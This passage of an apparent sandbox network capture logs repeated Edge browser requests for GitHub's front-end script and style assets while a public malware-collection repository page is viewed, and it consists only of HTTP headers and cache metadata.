sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 08 May 2024 21:12:09 GMT
etag: 0x8DC6FA385A749CB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 344188
x-served-by: cache-iad-kcgs7200091-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 19, 7682
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4a33007b3246645de4d1c5aba46ac331399cb359
content-length: 10294
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-674f4853d4fe.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-674f4853d4fe.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 15:39:49 GMT
etag: 0x8DC5EF49DBDD01D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 602328
x-served-by: cache-iad-kcgs7200048-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 2, 13912
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a911b8195fab7b35121e98bbe0061b6084f57d44
content-length: 5719
-
Remote address:185.199.108.154:443RequestGET /assets/sessions-f9a6b5829a62.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 14:26:16 GMT
etag: 0x8DC5EEA57B78A54
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
age: 520623
x-served-by: cache-iad-kjyo7100023-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 13, 5745
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 768f36bc01621162f172ec321437b3f5fa30b657
content-length: 4531
-
GEThttps://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BF8E4146
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 3135898
x-served-by: cache-iad-kjyo7100077-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 31, 41137
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8b9d38f9bc0952a8aa5b847cb9ae3eb886b4188a
content-length: 621
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-11c80a0-09f82b2af635.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-11c80a0-09f82b2af635.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 27 Mar 2024 21:48:19 GMT
etag: 0x8DC4EA79DA54F07
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 3249678
x-served-by: cache-iad-kjyo7100128-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 70, 37013
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 105442d2928c1e95c9208bbb4d91315627f0a710
content-length: 6146
-
GEThttps://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-ce8b18080d9c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_components_search_custom-scopes-element_ts-ce8b18080d9c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 16:40:23 GMT
etag: 0x8DC65466748A63B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 1224847
x-served-by: cache-iad-kjyo7100109-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 80, 6654
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9b6064c358948ce9d2576b4770adba3dae7283f9
content-length: 7244
-
GEThttps://github.githubassets.com/assets/node_modules_github_mini-throttle_dist_index_js-app_assets_modules_github_blob-anchor_ts-app_-55c012-6f0349cfd4d6.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/node_modules_github_mini-throttle_dist_index_js-app_assets_modules_github_blob-anchor_ts-app_-55c012-6f0349cfd4d6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 02 May 2024 17:30:25 GMT
etag: 0x8DC6ACD8DB15CE5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 857310
x-served-by: cache-iad-kiad7000144-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 12, 20377
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 909aca6350a5c34980a9d8843073c14616005332
content-length: 6048
-
GEThttps://github.githubassets.com/assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:08 GMT
etag: 0x8DC33C6BF675D1A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 2268524
x-served-by: cache-iad-kcgs7200178-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 30, 37002
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1bc53d46c356e9ffd0fd4018c0bcf99c58ffbb74
content-length: 5654
-
GEThttps://github.githubassets.com/assets/chunk-app_assets_modules_github_visible_ts-app_components_search_qbsearch-input-element_ts-ui_packa-6009e2-1852366f7616.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-app_assets_modules_github_visible_ts-app_components_search_qbsearch-input-element_ts-ui_packa-6009e2-1852366f7616.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 06 May 2024 20:00:21 GMT
etag: 0x8DC6E072945681E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 519858
x-served-by: cache-iad-kcgs7200159-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 2, 13575
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6d4f494640fe856fbf6061ec743aa19d51380220
content-length: 21739
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-de7fa58bee69.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-de7fa58bee69.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 11 Apr 2024 17:44:14 GMT
etag: 0x8DC5A4F011731EA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 2751625
x-served-by: cache-iad-kcgs7200075-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 69, 41898
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a1593a9efa683152213d913710991bf645e07529
content-length: 3383
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-5f065a01fd56.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-5f065a01fd56.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 17 Apr 2024 20:43:23 GMT
etag: 0x8DC5F1F06936ED0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 2157982
x-served-by: cache-iad-kcgs7200163-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 25, 43075
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c99965be4bf1808ec4e66860b1c5fa067e87ff3b
content-length: 3598
-
GEThttps://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-ui_packages_safe-storage_safe-storage_ts-3d55cbd7ee1a.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_query-builder-element_query-builder-element_ts-ui_packages_safe-storage_safe-storage_ts-3d55cbd7ee1a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 19 Apr 2024 16:15:58 GMT
etag: 0x8DC608BFF60A200
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 2072021
x-served-by: cache-iad-kcgs7200177-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 93, 6685
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f0d52db694f95764841839fa6c1ab9cb3792b4ca
content-length: 10109
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-3f73a4-a192cb57381c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-3f73a4-a192cb57381c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 25 Apr 2024 16:40:23 GMT
etag: 0x8DC654667755059
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 1224973
x-served-by: cache-iad-kiad7000119-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 20, 30076
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e0e8265ba5e8579becdee35540468c1da3d82d63
content-length: 10546
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:09 GMT
etag: 0x8DC33C6BFC3BB17
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 3254738
x-served-by: cache-iad-kjyo7100116-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 31, 41086
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7fa63fecd35c3915c36f5e13cc12a6855f66b01c
content-length: 3118
-
GEThttps://github.githubassets.com/assets/ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-f92c1226319d.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-f92c1226319d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 03 May 2024 06:18:42 GMT
etag: 0x8DC6B38E1AAB7BF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 857204
x-served-by: cache-iad-kjyo7100079-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 44, 4366
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0e7657faf80f8094e5b75a5a5085940dd81ac88e
content-length: 5342
-
GEThttps://github.githubassets.com/assets/chunk-node_modules_primer_behaviors_dist_esm_scroll-into-view_js-e237597b3b95.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-node_modules_primer_behaviors_dist_esm_scroll-into-view_js-e237597b3b95.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 22 Mar 2024 00:12:53 GMT
etag: 0x8DC4A04D1882E5A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 857272
x-served-by: cache-iad-kjyo7100125-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 1, 11698
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a9c522b591683cdd57aff5775deabe5795e8afb8
content-length: 394
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 18 Dec 2023 16:53:05 GMT
etag: 0x8DBFFE9CE26CFC7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
age: 2437059
x-served-by: cache-iad-kjyo7100095-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 53, 40090
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 17513283bd93bb93572f9302cb1579e127674fef
content-length: 10740
-
GEThttps://github.githubassets.com/assets/react-code-view.f2d60f636eb02c2001df.module.cssmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/react-code-view.f2d60f636eb02c2001df.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Tue, 23 Apr 2024 17:56:09 GMT
etag: 0x8DC63BEA7D83613
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 1582250
x-served-by: cache-iad-kcgs7200058-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 1, 11884
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1aefde4cb122698fb83d08f84e5332674059d087
content-length: 303
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-7742a325a895.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-7742a325a895.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 03 May 2024 06:18:43 GMT
etag: 0x8DC6B38E2192A4B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 857210
x-served-by: cache-iad-kjyo7100127-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 76, 2419
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 225d383eb1e15dfca15d63e19f8b4ea238c737f0
content-length: 13163
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8fb4cb0b8bf3.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8fb4cb0b8bf3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
